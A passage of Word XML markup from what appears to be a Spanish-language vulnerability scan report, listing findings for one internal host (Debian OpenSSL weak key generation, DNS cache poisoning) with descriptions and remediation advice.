                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="769C2912" w14:textId="377EEAE0" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC6AE5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>192.168.2.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FE08801" w14:textId="391ADE99" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF1C4C">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Debian OpenSSH/OpenSSL Package Random Number Generator Weakness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DAA2CE2"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43CE80EE" w14:textId="77BAC860" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pP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3305465F" w14:textId="5B50D6FC" w:rsidR="00343B24" w:rsidRPr="00EF2CD6" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2CD6">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>La clave de host SSH remota se ha generado en un sistema Debian o Ubuntu que contiene un error en el</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2CD6">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>generador de números aleatorios de su biblioteca OpenSSL.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="22C5D362" w14:textId="08813C6E" w:rsidR="00343B24" w:rsidRPr="00EF2CD6" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2CD6">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>El problema se debe a que un empaquetador de Debian elimina casi todas las fuentes de entropía en la versión remota de</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> Open </w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2CD6">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>SSL.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6434F9E2" w14:textId="0B5CD736" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EF2CD6">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">Un atacante puede obtener fácilmente la parte privada de la clave remota y usarla para configurar el descifrado del control </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>de la sesión remota</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF2CD6">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> o establecer un hombre en el ataque medio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F63419F" w14:textId="176CDB47" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00723C06">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Considere que todo el material criptográfico generado en el host remoto se puede adivinar. En particular, todo SSH,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> e</w:t>
            </w:r>
            <w:r w:rsidRPr="00723C06">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>l material de clave SSL y OpenVPN debe volver a generarse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343B24" w:rsidRPr="0076603F" w14:paraId="4CF88252" w14:textId="77777777" w:rsidTr="00343B24">
        <w:trPr>
          <w:trHeight w:val="2404"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="222B41B9" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C1EC13F" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1399ECEC" w14:textId="7085125F" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC6AE5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>192.168.2.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E6AAFB7" w14:textId="06B388F5" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00723C06">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">Debian OpenSSH/OpenSSL Package Random Number Generator Weakness (SSL </w:t>
            </w:r>
            <w:r w:rsidR="004A3343" w:rsidRPr="00723C06">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>check)</w:t>
            </w:r>
            <w:r w:rsidR="004A3343">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve">SMTP, </w:t>
            </w:r>
            <w:r w:rsidR="004A3343">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>PostgreSQL</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1322DC59" w14:textId="3A8C9631" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2610B0D3"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3B6C082A" w14:textId="23A4F45B" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pP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2BE87AB3" w14:textId="13485988" w:rsidR="00343B24" w:rsidRPr="00723C06" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00723C06">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>El certificado x509 remoto en el servidor SSL remoto se ha generado en un sistema Debian o Ubuntu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00723C06">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>que contiene un error en el generador de números aleatorios de su biblioteca OpenSSL.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A18E617" w14:textId="4F77ADAA" w:rsidR="00343B24" w:rsidRPr="00723C06" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00723C06">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>El problema se debe a que un empaquetador de Debian elimina casi todas las fuentes de entropía en la versión remota de</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> Open</w:t>
            </w:r>
            <w:r w:rsidRPr="00723C06">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> SSL.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3A821830" w14:textId="4AE9748D" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00723C06">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Un atacante puede obtener fácilmente la parte privada de la clave remota y usarla para descifrar la sesión remota</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00723C06">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>o establecer un hombre en el ataque medio.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BE6B69D" w14:textId="40495F47" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA10C5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Considere que todo el material criptográfico generado en el host remoto se puede adivinar. En particular, todo SSH, el material de clave SSL y OpenVPN debe volver a generarse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343B24" w:rsidRPr="007B2D98" w14:paraId="22944381" w14:textId="77777777" w:rsidTr="00343B24">
        <w:trPr>
          <w:trHeight w:val="1538"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="262E3B48" w14:textId="77777777" w:rsidR="00343B24" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="74AC6318" w14:textId="02E855BF" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC6AE5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>192.168.2.102</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2268" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="146291B9" w14:textId="4C110E87" w:rsidR="00343B24" w:rsidRPr="00AA10C5" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA10C5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-GB" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Multiple Vendor DNS Query ID Field Prediction Cache Poisoning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:noWrap/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04541F92"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247D1F61" w14:textId="31B54341" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">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6F29966A" w14:textId="65D7137D" w:rsidR="00343B24" w:rsidRPr="00F26227" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA10C5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>El solucionador de DNS remoto no utiliza puertos aleatorios cuando realiza consultas a servidores DNS de terceros. Un atacante remoto no autenticado puede explotar esto para envenenar el servidor DNS remoto, lo que le permite al atacante</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00AA10C5">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>desviar el tráfico legítimo a sitios arbitrarios.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3718" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DCE8EFD" w14:textId="77777777" w:rsidR="00343B24" w:rsidRPr="002B14D2" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="297C59F8" w14:textId="485040CC" w:rsidR="00343B24" w:rsidRPr="007B2D98" w:rsidRDefault="00343B24" w:rsidP="00343B24">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007B2D98">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="es-419" w:eastAsia="es-419"/>
              </w:rPr>
              <w:t>Póngase en contacto con su proveedor de servidor DNS para obtener un parche.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00343B24" w:rsidRPr="0076603F" w14:paraId="3B8E3B69" w14:textId="77777777" w:rsidTr="00343B24">
        <w:trPr>
          <w:trHeight w:val="1305"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1413" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
